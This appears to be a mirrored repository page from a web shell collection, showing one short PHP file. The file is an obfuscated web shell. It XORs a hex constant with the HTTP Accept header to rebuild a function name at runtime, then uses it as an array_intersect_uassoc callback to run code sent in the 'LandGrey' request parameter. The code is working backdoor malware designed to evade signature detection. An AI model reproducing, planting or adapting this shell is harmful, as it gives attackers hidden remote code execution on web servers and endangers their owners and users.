1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00
Files
webshell/php/array_intersect_uassoc-headers-accept-r.php
2018-12-20 11:34:55 +08:00

8 lines
234 B
PHP

<?php
$password = "LandGrey";
$key = substr(__FILE__,-5,-4);
${"LandGrey"} = $_SERVER["HTTP_ACCEPT"]."Land!";
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
?>